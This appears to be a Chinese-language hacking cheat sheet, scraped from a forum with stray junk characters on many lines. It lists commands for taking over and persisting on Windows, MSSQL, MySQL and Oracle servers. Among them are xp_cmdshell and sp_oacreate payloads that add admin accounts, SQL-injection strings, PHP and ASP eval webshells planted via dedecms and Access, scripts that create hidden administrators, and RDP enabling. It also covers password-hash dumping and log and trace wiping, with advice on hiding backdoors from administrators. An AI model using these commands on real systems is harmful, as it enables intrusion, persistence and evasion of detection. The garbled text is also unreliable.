3 I" F2 p. y3 S( z, L6 \. J
1.net user administrator /passwordreq:no L" Z: n' I3 }4 ?6 k! t
这句的意思是"administrator帐号不需要密码",如果可以成功执行的话,3389登陆时administrator的密码就可以留空,直接登陆了,然后进去后再net user administrator /passwordreq:yes恢复就可以了, H3 J# y/ h7 c
2.比较巧妙的建克隆号的步骤
) T( t. [& D7 O1 \; ~先建一个user的用户3 U- w1 H+ c8 @* p
然后导出注册表。然后在计算机管理里删掉
7 B0 Y/ w. e4 G在导入,在添加为管理员组
4 I. B9 B o2 p: v3.查radmin密码& { J; l4 O1 O
reg save HKEY_LOCAL_MACHINE\SYSTEM\RAdmin c:\a.reg4 _; I. T H8 D2 q# ]
4.[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Window NT\CurrentVersion\Image File execution options]
2 z8 y+ O; c# g. Z3 M: d6 N建立一个"services.exe"的项
. d4 Q8 x8 A9 R2 W8 [. O: d再在其下面建立(字符串值); N5 L, O2 Y& d" b; d. U6 h
键值为mu ma的全路径
2 Y7 Q: l' w0 l! I- V1 f5.runas /user:guest cmd
% M, `, l7 B% `3 n( r测试用户权限!
+ N) t p( v" x2 ^) K( I6.、 tlntadmn config sec = -ntlm exec master.dbo.xp_cmdshell \'tlntadmn config sec = -ntlm\'-- 其实是利用了tlntadmn这个命令。想要详细了解,输入/?看看吧。(这个是需要管理员权限的哦)建立相同用户通过ntml验证就不必我说了吧?0 u9 \7 {8 V! B
7.入侵后漏洞修补、痕迹清理,后门置放:
; l' {% M. x# ?+ r基础漏洞必须修补,如SU提权,SA注入等。DBO注入可以考虑干掉xp_treelist,xp_regread自行记得web目录;你一定要记得清理痕迹~sqlserver连接使用企业管理器连接较好,使用查询分析器会留下记录,位于HKEY_CURRENT_USER\Software \Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers。删除之;IISlog的清除可不要使用AIO类的工具直接完全删除日志~可以选择logcleaner类工具只删除指定IP的访问记录,如果你能gina到管理员密码则通过登陆他清理日志并通过WYWZ进行最后的痕迹清理。话说回来手动清理会比较安全。最后留下一个无日志记录的后门。一句话后门数个,标准后门,cfm后门我一般都不会少。要修改时间的哦~还有一招比较狠滴,如果这个机器只是台普通的肉鸡,放个TXT到管理员桌面吧~提醒他你入侵了,放置了某个后门,添加了某个用户~(当然不是你真正滴重要后门~)要他清理掉。这样你有很大的可能性得以保留你的真实后门
; Y9 y9 F; ^( Y D8.declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c4 x2 `! g% v' F$ m
; B5 y* g8 ?8 `/ v
for example
% \3 w B/ s* u" L+ X2 D
' W- [8 a# b5 b6 M, B5 Ydeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user aptime aptime /add'
8 @6 T ?# Q5 T4 J' g, F# [; ? H# d7 V
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrator aptime /add'
: @; e* a- Y! x! K+ U2 N: x' `2 K& Q% G/ G4 {0 \' [' P) T
9:MSSQL SERVER 2005默认把xpcmdshell 给ON了
0 T& H3 d' B/ x+ i" X2 S; l; K如果要启用的话就必须把他加到高级用户模式4 R5 a/ x; q+ B* T! l
可以直接在注入点那里直接注入/ k/ a7 t' D& M( h
id=5;EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--
\" A; b% _3 o' `" M* U然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll");--
. J1 e+ n O- K( P, P& M3 G, f0 _" m或者/ H+ ?% C& H3 t" g
sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'' {7 O) `" `0 T/ j0 c/ L$ Y8 d
来恢复cmdshell。
! I3 ` o+ |/ ?. `* q& z
h. `' U1 `/ T# I, q E分析器
$ K+ F/ d' P( j% Y7 ^EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--
1 E- c: W( T; v7 I: D; ]3 F9 W然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll")
& [( \2 l# x2 }( L, A O r7 G10.xp_cmdshell新的恢复办法. x7 B) J/ S9 Q8 F* T& b
xp_cmdshell新的恢复办法2 R4 Y* L, S: @1 q# S- W$ m+ y
扩展储存过程被删除以后可以有很简单的办法恢复:
( ?+ G. w0 Z$ q0 ~( I删除9 S1 ]6 q7 V5 W. ~+ J& j6 ^- [
drop procedure sp_addextendedproc
& t" h" {1 c* Y+ Ldrop procedure sp_oacreate* p% {& X. J. O5 `
exec sp_dropextendedproc 'xp_cmdshell'
% m) e8 X% t2 i: d
" J( S: j- I: _; v# Z0 l恢复
" H' W+ X* f U+ U* kdbcc addextendedproc ("sp_oacreate","odsole70.dll")
0 W5 m, t2 e: k8 u/ {9 _. q9 [6 {; Cdbcc addextendedproc ("xp_cmdshell","xplog70.dll")
4 x, d2 {* H1 I3 [% S% L8 V+ K& n5 D& P
这样可以直接恢复,不用去管sp_addextendedproc是不是存在
+ c1 i" U1 s% A) U) q* Z! {& C' A
3 J; t' G$ I. T-----------------------------5 t) D2 _) P# Z; e8 a6 k1 {0 Z% p' ~
+ v5 M) a+ n/ Y
删除扩展存储过过程xp_cmdshell的语句:2 V d8 [, b6 Z6 u
exec sp_dropextendedproc 'xp_cmdshell'9 D1 l5 U' F6 [ p4 o
5 K l0 E z. ?" K! B0 \- v- H! M
恢复cmdshell的sql语句
) q" e# i5 k0 g& L6 I/ o$ \( rexec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'6 ^: c& j5 w D* D4 b; Y
Z2 C; M/ x5 x( _8 J- q+ G* D) j H! G5 K+ D6 g G6 U2 @
开启cmdshell的sql语句: d$ w" E! b w4 k) @: ~
. I7 S% r* Z( g$ N/ R0 p" ~exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
' K- U" |. K! m
8 j( p! Z& l1 ^判断存储扩展是否存在- Z6 Y& v9 P7 g. |0 z
select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
9 W+ K( S% J" x& ]返回结果为1就ok B) ?+ d4 d0 k" c0 a4 h
5 G9 i J4 v& `! }/ G恢复xp_cmdshell- w- d# P% _* l1 x* M% y
exec master.dbo.addextendedproc 'xp_cmdshell','xplog70.dll';select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'6 w( O, ~5 ?7 v: |0 \7 [3 _
返回结果为1就ok
, k: g! T/ E4 S- Z1 ~) e* Q0 N* C2 z" ?# k& T' {
否则上传xplog7.0.dll1 t0 H$ R3 i3 ]4 s
exec master.dbo.addextendedproc 'xp_cmdshell','c:\winnt\system32\xplog70.dll'% m4 Y; o, @+ s, q* V( o$ A
% r/ W$ S% A9 d$ a( \& i( `9 ~
堵上cmdshell的sql语句
9 b/ I1 ]$ I# x- Z8 `sp_dropextendedproc "xp_cmdshel
9 j' W% }8 M# [! B" U4 t-------------------------9 c8 }6 L. }: R
清除3389的登录记录用一条系统自带的命令:6 t0 ?+ y1 J+ G. U
reg delete "hkcu\Software\Microsoft\Terminal Server Client" /f
& L" l5 ~- P& J+ P e
5 c# F! S# x f3 l% F8 P# N然后删除当前帐户的 My Documents 文件夹下的 Default.rdp 文件
' S+ H. y4 W( R0 I" A }: _在 mysql里查看当前用户的权限
{, F: ~) ?) Q4 kshow grants for
% j, [3 O" c, k: O0 T6 M" \3 I5 q7 s1 E% W. k" ]
以下语句具有和ROOT用户一样的权限。大家在拿站时应该碰到过。root用户的mysql,只可以本地连,对外拒绝连接。以下方法可以帮助你解决这个问题了,下面的语句功能是,建立一个用户为itpro 密码123 权限为和root一样。允许任意主机连接。这样你可以方便进行在本地远程操作数据库了。/ ?: h' y( `0 V, D
8 L1 L5 M) w3 c+ p% i
" S9 P% b5 \1 {) X- c* Z
Create USER 'itpro'@'%' IDENTIFIED BY '123';' w8 \( c! Q% l% w
, W5 {, p: u; Q- h+ c: l. Y
GRANT ALL PRIVILEGES ON *.* TO 'itpro'@'%' IDENTIFIED BY '123'WITH GRANT OPTION( ?% d A3 X1 ?, a: p; y) F
- {: C* e$ G3 d# YMAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0
1 G5 v7 T1 H" I1 x Z5 P# \
- Z/ Y" H9 B% g2 b( qMAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;
7 M/ ~+ g* ]9 Q
, h0 m: S/ P& k搞完事记得删除脚印哟。
$ m& Y% k' | Y2 S. j" ^7 z, W4 Y& Q/ T6 i1 V0 O
Drop USER 'itpro'@'%';# n+ f A# `/ p; t* D' u
2 l% z7 S* P8 _: i7 g
Drop DATABASE IF EXISTS `itpro` ;
/ O! m, ~* E7 a- \/ ?1 F- H( S& Z$ T3 n1 v. X: m
当前用户获取system权限% }. [/ K: }& Y; D' \
sc Create SuperCMD binPath= "cmd /K start" type= own type= interact/ \2 i" T( b u5 ?" K: R1 J$ ?" F
sc start SuperCMD
X5 M/ l1 l3 ?, [& M& B程序代码
+ c- b; i! V5 W' N) U<SCRIPT LANGUAGE="VBScript">
: u' h' ^. l [: L7 O- ?4 yset wsnetwork=CreateObject("WSCRIPT.NETWORK")1 B: m% L+ e0 B
os="WinNT://"&wsnetwork.ComputerName
) }4 s& g7 Z. y1 sSet ob=GetObject(os)+ }2 {+ f) f K
Set oe=GetObject(os&"/Administrators,group")5 v5 L0 j( R$ H( U& J! M
Set od=ob.Create("user","nosec")
% F, q- X; Z4 k- h+ C, }od.SetPassword "123456abc!@#"8 U0 q* ]* i4 z$ M9 \" r
od.SetInfo
: I" S+ T* u& q3 hSet of=GetObject(os&"/nosec",user)
" u5 i }9 M* L* `: Ooe.add os&"/nosec"
) K2 l* M; Y( N" |3 S. I</Script>
+ f/ I! ~ x& H1 }% v0 P<script language=javascript>window.close();</script>
5 T4 I7 x/ |" ^% G6 P+ U; N7 L: Y4 J) {; ]9 r/ A) q& H
6 b! ] N9 P$ @3 }* i% |
: D' E+ r8 a; w
9 ~7 s5 [' q6 P( n9 Q: p \2 h' X突破验证码限制入后台拿shell5 g2 u( p& I$ c- D
程序代码
; d- `- c0 B1 J$ i1 @: ^REGEDIT4 : Z- |9 u8 o% o3 j2 e
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security]
" w! w3 t. [% I/ c, e% e8 w"BlockXBM"=dword:00000000
. I+ C4 ?- \! y; V. m- {8 k' P4 \: O( h/ y% ~2 P) H4 w7 F
保存为code.reg,导入注册表,重器IE4 R( B, n/ l# [
就可以了
0 Z* ^/ O) e( k! v$ x0 }union写马$ Y( M- j! M, [$ B0 ^
程序代码
$ f" |6 \" ~* owww.baidu.com/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,3,4,'<?php%20eval($_POST[cmd])?>',6+into+outfile+'D:\\wwwroot\\duizhang.php'+/*) K l: x' f8 k7 {& o9 N- W. K2 f
5 O+ ^& y3 _) c5 ^) J' F- i
应用在dedecms注射漏洞上,无后台写马
K( U, U3 @; Z3 ~) X' |( Q( R1 ydedecms后台,无文件管理器,没有outfile权限的时候
3 j" X( O2 q, B$ P/ a0 e8 |1 q在插件管理-病毒扫描里3 q6 p' ]1 M" g5 @ v
写一句话进include/config_hand.php里
# D9 X5 B! |2 D# n* k9 r* z4 k程序代码
1 t+ Y( S) x& l K; n, D>';?><?php @eval($_POST[cmd]);?>
! ?2 q# O. X9 H1 m# d3 M0 D' W7 w0 r" ?
. }: V" ]0 k: K$ O; P+ s' b: P
如上格式0 [/ J, G, y+ \3 y+ E) S
3 U( m0 b# [9 c8 U+ |
oracle中用低权限用户登陆后可执行如下语句查询sys等用户hash然后用cain破解
8 U( `% S2 ^- q3 x1 b: Z2 H: }7 Q程序代码& r" a( ^/ T: I1 o3 V) v0 M
select username,password from dba_users;
. M! V3 ~* o; _( [4 H k# ^$ b) a6 f
( \# r$ U6 F! P! s. rmysql远程连接用户% ?) ]" V/ V1 x5 l% S; l
程序代码4 i' F" t1 A% f1 P. x3 S- e
- m0 i! ~3 O# A0 I
Create USER 'nosec'@'%' IDENTIFIED BY 'fuckme';
& M1 e& y4 u. y! rGRANT ALL PRIVILEGES ON *.* TO 'nosec'@'%' IDENTIFIED BY 'fuckme' WITH GRANT OPTION
5 L* _" \$ a9 R8 Y+ \MAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0/ L6 o# N1 B! ]
MAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;6 T+ ~) i$ v7 h: P
: q( b+ {0 a+ m% Z) X
! N/ n3 d A: Z+ _9 k- X# r: ?: |* x# s
. ]3 E# D$ \ R f* n- y
echo y |reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 00 b1 ]4 B: c/ O3 B
" v2 r) z/ W$ D0 d# a' x1.查询终端端口
$ c3 C, T) o* |5 s* g% W/ @! q
- M- W9 |; g3 V- l2 M: x- I+ oxp&2003:REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber- U* O9 _* y( k& _' |6 A
; t: A6 d9 R `# p* ^6 X通用:regedit /e tsp.reg "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal server\Wds\rdpwd\Tds\tcp"4 P& s# B; n, ]2 Y: B) H5 q
type tsp.reg7 a9 \9 W, }5 x7 P, a
- |! ~' B. A3 ]2.开启XP&2003终端服务. Q. C" Y) m5 N1 }) ^
b; R- L0 @ P ` _! C
! n$ E0 L, ^0 ~. p
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f0 U4 I% z! W9 F9 f
$ R# c0 K, n% h, `# C$ R) B
( R) K; n1 ?. T
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f7 e. @& R6 y4 i: d) D/ s. \, c
# p7 Q& { C5 F9 v; _% s1 z. y3 _: e3.更改终端端口为20008(0x4E28)
$ {" z; L7 y d0 {8 {& `) o$ s9 ?" g/ F1 u9 C. c' j( o y
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f
! d9 n! R0 K$ x: s: k4 E. z$ E' y6 x. r' }+ _
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f1 f# M$ Q- `6 g7 T5 p y5 Q
N( ?6 F* A+ g! m
4.取消xp&2003系统防火墙对终端服务3389端口的限制及IP连接的限制
- _6 \: W- O. G! S% x
' t' @# F% N4 Y3 U3 Z2 d& l, R( r6 CREG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabledxpsp2res.dll,-22009 /f9 B& j: Q# O& I
6 x8 J$ V" `0 k2 t0 ^5 P% [2 e. c& z
8 r" K% m) {6 u! X1 v" D4 `
5.开启Win2000的终端,端口为3389(需重启), ]$ G- t) _9 V# ~# G
" ~2 v; [. V! b7 ?echo Windows Registry Editor Version 5.00 >2000.reg
, B% \" w& y2 [' J% y4 o7 Kecho. >>2000.reg; X) U. O( |' W, }3 i
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>2000.reg ( `& M8 m( T6 u' R
echo "Enabled"="0" >>2000.reg
2 v Y. b5 b# I! K7 r9 jecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>2000.reg
* S2 {+ W8 \% P$ yecho "ShutdownWithoutLogon"="0" >>2000.reg 5 d2 }; Y/ l: W6 W- q
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >>2000.reg
; g# |( ~. D7 I3 x8 Z( g! techo "EnableAdminTSRemote"=dword:00000001 >>2000.reg . I. h! K5 N; b9 S) g0 z
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>2000.reg
$ r/ C, `+ T1 a, @3 X; recho "TSEnabled"=dword:00000001 >>2000.reg 2 l8 r; u5 }! b* F
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>2000.reg
% T- s+ B9 C6 w' \8 G4 x I* S8 gecho "Start"=dword:00000002 >>2000.reg
0 V0 S3 W5 ~4 U7 gecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >>2000.reg
3 G- V- e) W6 ^' ]/ I o" {0 q2 s! necho "Start"=dword:00000002 >>2000.reg
6 `: D' K. p0 [1 |echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>2000.reg 8 |" m+ _! c! _- j& F
echo "Hotkey"="1" >>2000.reg ) R/ C/ M T7 |1 h& _0 S- y( O( g
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>2000.reg
, B j1 G9 C. K K6 h$ L6 Vecho "ortNumber"=dword:00000D3D >>2000.reg
2 k2 ?9 S; a) p: ]+ ?8 Yecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>2000.reg
, z$ \$ h0 L% L: `7 D/ v% v% n+ gecho "ortNumber"=dword:00000D3D >>2000.reg
7 m6 ]7 j7 K& Q& y
q. b* Q& l% h* d( V9 Q6.强行重启Win2000&Win2003系统(执行完最后一条一句后自动重启)
9 @" f+ d9 v) z) X; B c6 b. i* G; \9 j
@ECHO OFF & cd/d %temp% & echo [version] > restart.inf5 Z4 e5 {$ g% D4 u
(set inf=InstallHinfSection DefaultInstall)/ q3 C1 ]" X( O# k% B6 k2 S
echo signature=$chicago$ >> restart.inf
' |, y5 I$ K* Y& B2 K9 Becho [defaultinstall] >> restart.inf$ z2 ~5 Z1 S/ t7 l y2 V1 C' C
rundll32 setupapi,%inf% 1 %temp%\restart.inf
1 o% g6 j7 D! D+ ]3 z# V
2 b2 z! s4 s; M* L4 a
% k& D7 @! g9 g7.禁用TCP/IP端口筛选 (需重启)
7 D0 @; c* V. R6 Z, f% h
0 ?: T# R4 Z2 {) G [REG ADD HKLM\SYSTEM\ControlSet001\Services\Tcpip\parameters /v EnableSecurityFilters /t REG_DWORD /d 0 /f
1 K+ w) i- _9 A
% |$ V8 n/ {2 Q8 Y/ `$ m( t9 c8.终端超出最大连接数时可用下面的命令来连接% K% ~) l2 v$ E2 `% |
2 G7 ~/ ]# U3 V. }/ V9 B7 O4 Y
mstsc /v:ip:3389 /console: F! ^0 s$ z7 [5 Y
4 A; }0 |8 O* \% @5 @3 T8 m& O
9.调整NTFS分区权限" Z% {& p' D! ]+ l7 h6 E
1 E2 s# j! K: k9 {$ F) ?
cacls c: /e /t /g everyone:F (所有人对c盘都有一切权利)
1 h8 F4 {: \. I2 [, U- Y' ~! N' e0 N0 `: m0 |2 S
cacls %systemroot%\system32\*.exe /d everyone (拒绝所有人访问system32中exe文件)
! D- _8 V+ }! A! j/ |
: ^) H$ w0 `! S l% v5 H0 D------------------------------------------------------7 ?( Z) `- }9 H* ^0 m t
3389.vbs . V$ }& O7 C. s. v; Y
On Error Resume Next
: u$ [* e* w* B K' Lconst HKEY_LOCAL_MACHINE = &H80000002
5 t& m3 ^/ _2 t+ J( {0 DstrComputer = "."
2 P+ }% A2 [3 B5 R$ m8 _( _8 s( ]Set StdOut = WScript.StdOut
( z' v s) z3 h5 w: k$ Q) }# a" C2 _Set oreg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_$ r* K8 I: w0 p7 U/ _
strComputer & "\root\default:StdRegProv")& L0 G4 R% B# X1 w$ N7 ~
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
7 P- D8 c8 G; j( {- [ M* j Poreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath Y. s. O7 k+ i% [& R6 k3 h
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"4 q0 M5 H% n! {- h) m
oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
x% B% Z. e6 f* C; o# M( R9 P! xstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
: H5 a. _3 T8 m9 H0 R- @( MstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"1 c+ q6 {6 r$ @. T! X7 N- |
strValueName = "fDenyTSConnections"
8 x5 Y. Q1 v0 Y. L4 A w. qdwValue = 0
, z1 y* d% {+ d0 j- Loreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
6 R& u$ H3 b1 ~# j+ {7 D; \; EstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"7 L& G# n1 A: H9 r. P
strValueName = "ortNumber"
8 w0 u1 t" @3 s) ?1 Q2 `( GdwValue = 3389. K( u) P/ V& [7 p
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
) ^0 \; N7 L: ` a$ ~$ V9 YstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
# S9 Z% U" O7 rstrValueName = "ortNumber"
8 T3 ~# h' y* A9 b8 o' \dwValue = 3389
8 H& \. i) W3 b: s3 k2 S! X4 E4 g3 aoreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
* u1 l; N% B' I- X+ qSet R = CreateObject("WScript.Shell") - r( [+ |- l* M3 N4 F
R.run("Shutdown.exe -f -r -t 0")
% |& m' `% |2 w/ F- _
+ { e |' `; s删除awgina.dll的注册表键值
( Q! `( w" n+ A: X! }9 l程序代码
" n3 k' |4 t' _) r8 O% F
8 V5 |$ X" R2 {4 e, Rreg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v GinaDLL /f
k. I' A7 S. r) W8 b, i, ]/ M. n2 b9 Y( z. C) [6 P
8 u8 U: f. f/ c5 ^9 z
, b7 o0 @- C9 G& g1 y7 Y
- h4 C8 D7 _7 o0 J7 t6 u程序代码
h/ ?" r4 L A6 fHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\NoLMHash
1 X4 b( i+ b! i' X3 o& l( B& M' q% b3 M6 w- h. F% H6 U: U! X
设置为1,关闭LM Hash
' n9 y7 }, T) N# x* @5 l) S& r- i% X
3 T, K+ }. O8 `" D& {1 W! ]- K/ t数据库安全:入侵Oracle数据库常用操作命令
1 @$ C% T7 j9 m: J$ _最近遇到一个使用了Oracle数据库的服务器,在狂学Oracle+请教高手后终于搞到了网站后台管理界面的所有用户密码。我发现Oracle操作起来真是太麻烦,为了兄弟们以后少走些弯路,我把入侵当中必需的命令整理出来。
( Q$ p- S. J- [( i4 j1 g- f/ `1、su – oracle 不是必需,适合于没有DBA密码时使用,可以不用密码来进入sqlplus界面。$ {& H# F% t0 Z6 F# u& { j. c
2、sqlplus /nolog 或sqlplus system/manager 或./sqlplus system/manager@ora9i;
1 H0 y: f! V u. k" }3、SQL>connect / as sysdba ;(as sysoper)或0 v! A5 s' X- K& p4 b: E
connect internal/oracle AS SYSDBA ;(scott/tiger)$ x/ ^7 o5 Y! m
conn sys/change_on_install as sysdba;0 k0 e1 S) G# o) |( D1 \- Z5 D5 t
4、SQL>startup; 启动数据库实例; e1 q3 L/ \* k# B
5、查看当前的所有数据库: select * from v$database;
: d* Q+ Z1 E: {* N X' X* Jselect name from v$database;
. r" m2 [% T0 {4 Q% G6、desc v$databases; 查看数据库结构字段
* c8 B, w+ j1 r7、怎样查看哪些用户拥有SYSDBA、SYSOPER权限:
, ~ X! N2 z: r+ USQL>select * from V_$PWFILE_USERS;
+ f$ J4 [1 h8 x7 C# |, aShow user;查看当前数据库连接用户
4 Q h. D" X0 T8、进入test数据库:database test;
* n1 V1 J: m$ O8 t! h9、查看所有的数据库实例:select * from v$instance;! m" r, a, I6 `0 Z" a9 \
如:ora9i; h0 z2 A8 s+ u" @7 ^' c! h) T2 I! P
10、查看当前库的所有数据表:
0 C% S/ f2 B% f; @* ?# Y4 hSQL> select TABLE_NAME from all_tables;
* D0 E) _( X2 s5 nselect * from all_tables;
: }9 Y; R3 Q# F/ v" NSQL> select table_name from all_tables where table_name like '%u%';
' i6 U8 P* I0 WTABLE_NAME5 w+ K+ M+ N3 t) {$ ]
------------------------------
! B. R9 W# X, a1 W" |_default_auditing_options_
@3 h5 n. H- Z2 k8 y* ~11、查看表结构:desc all_tables;" G7 n' k" `. @" o
12、显示CQI.T_BBS_XUSER的所有字段结构:- w# D# T$ G1 k
desc CQI.T_BBS_XUSER;# s" j+ m' [9 s8 @% @7 B* D3 Z- c
13、获得CQI.T_BBS_XUSER表中的记录:! V& ]8 n- h) ~! h* W" X
select * from CQI.T_BBS_XUSER;
2 F& k U, a0 j' b14、增加数据库用户:(test11/test)
7 c7 Q( y. R) J( G2 _7 }! hcreate user test11 identified by test default tablespace users Temporary TABLESPACE Temp;
3 H, r( s9 m/ f9 D" Y15、用户授权:4 b2 }: P3 E' t9 [% y
grant connect,resource,dba to test11;
- }: m5 z- y i8 fgrant sysdba to test11;3 S8 U, ~; D" C
commit;
/ l5 m8 U6 o, J16、更改数据库用户的密码:(将sys与system的密码改为test.)- c6 [0 M( N- v% H( D
alter user sys indentified by test;
" n$ |6 C! V- x+ j) S A9 f+ falter user system indentified by test;7 l( I. S2 b2 C0 a* v5 z2 ^
7 U' E& m4 K. ]# C6 z% }applicationContext-util.xml& N6 _* i# e% l3 c( I
applicationContext.xml; R$ T) |2 M# i- M0 ~' B
struts-config.xml
R" v v) _' z, a* F& ?web.xml
! I2 {/ ]4 x# k- O$ ^server.xml
/ ]8 V: T4 \ c! I) ]tomcat-users.xml1 a% o/ K3 x0 S h5 ^7 q0 ?
hibernate.cfg.xml
% M5 d' `) ]8 t- U6 T7 Kdatabase_pool_config.xml' F. U0 `9 `9 A' l( L( ^
& w9 x! l! p5 a @
: U0 L$ D' n0 g- M1 r\WEB-INF\classes\hibernate.cfg.xml 数据库连接配置
$ p. A& P+ n1 D% i\WEB-INF\server.xml 类似http.conf+mysql.ini+php.ini
7 g! M0 c* u% D* N8 I$ A\WEB-INF\struts-config.xml 文件目录结构. K0 _* Z! F3 J5 _3 ~8 Y" e9 b
7 D% d. f$ m5 W( E7 `% P
spring.properties 里边包含hibernate.cfg.xml的名称
5 Y5 W8 _, e" p, C S+ F' |% b7 R1 X; h
# X6 i, u7 [' O8 P( ?$ ?2 I5 G0 J0 C" t4 c0 |) \5 ?
C:\Program Files\Apache Software Foundation\Tomcat 5.5\conf\tomcat-users.xml
0 w' @/ E+ ^; j" Q1 t/ i( z6 ` d, _+ [( M* b% o) [3 }
如果都找不到 那就看看class文件吧。。) Y' V- K3 l! j! i, [
9 E% t5 A, A. |( A2 H. \1 P测试1:
, [5 t* R1 e8 a$ Y: e$ l) M1 aSELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t11 z* V; s8 C# ^/ \7 @: I. G0 g
9 ?& l. X. M j
测试2:
8 y% x5 V0 Q3 S! r3 }3 x) z1 N3 J5 |5 ]$ D
create table dirs(paths varchar(100),paths1 varchar(100), id int)
. ^5 _2 O. A1 m* _6 D1 M2 x$ K- M8 u
delete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--
) M1 ?% n; U6 q% \! t
% W) p3 w2 \! |; e8 U' LSELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1
4 x0 p' x) ?9 Z7 A8 X* i0 i
& L9 f2 f; E9 v' `( @1 ?/ }查看虚拟机中的共享文件:; S9 |$ W; F K4 L/ s" H
在虚拟机中的cmd中执行
" g' R8 S! ?3 |: `1 i1 {\\.host\Shared Folders% Y1 ^8 |" x/ D: t; E3 ~
1 c* W* N5 Z, |1 j: V* u0 L
cmdshell下找终端的技巧
( g$ h6 d! c( a# G, j; S找终端: . K- O. c# T7 \/ c3 k& m: `
第一步: Tasklist/SVC 列出所有进程,系统服务及其对应的PID值! ) z- T& f. e- v p
而终端所对应的服务名为:TermService
& ]" [% k U2 V# V' j$ |第二步:用netstat -ano命令,列出所有端口对应的PID值!
5 \$ U' W! f7 a& m 找到PID值所对应的端口
0 S# y/ v1 G9 b- y2 o& S y$ Z
9 A! G# b _; g& M查询sql server 2005中的密码hash2 Y" P5 V! o" I" y6 J' q: h3 Z7 p% j t
SELECT password_hash FROM sys.sql_logins where name='sa'% X7 F7 i8 F/ n; M" \
SELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a; e. M7 Y3 C, h2 @
access中导出shell
% p* _2 Y6 \- o0 I2 Y4 c
: K) S: m2 F7 ?6 T, `$ J中文版本操作系统中针对mysql添加用户完整代码:
" p' K. U, c: O" I3 ]
! n/ X m- _; f. O/ y& g) U/ fuse test;
, X( j( U! m/ b1 Tcreate table a (cmd text);
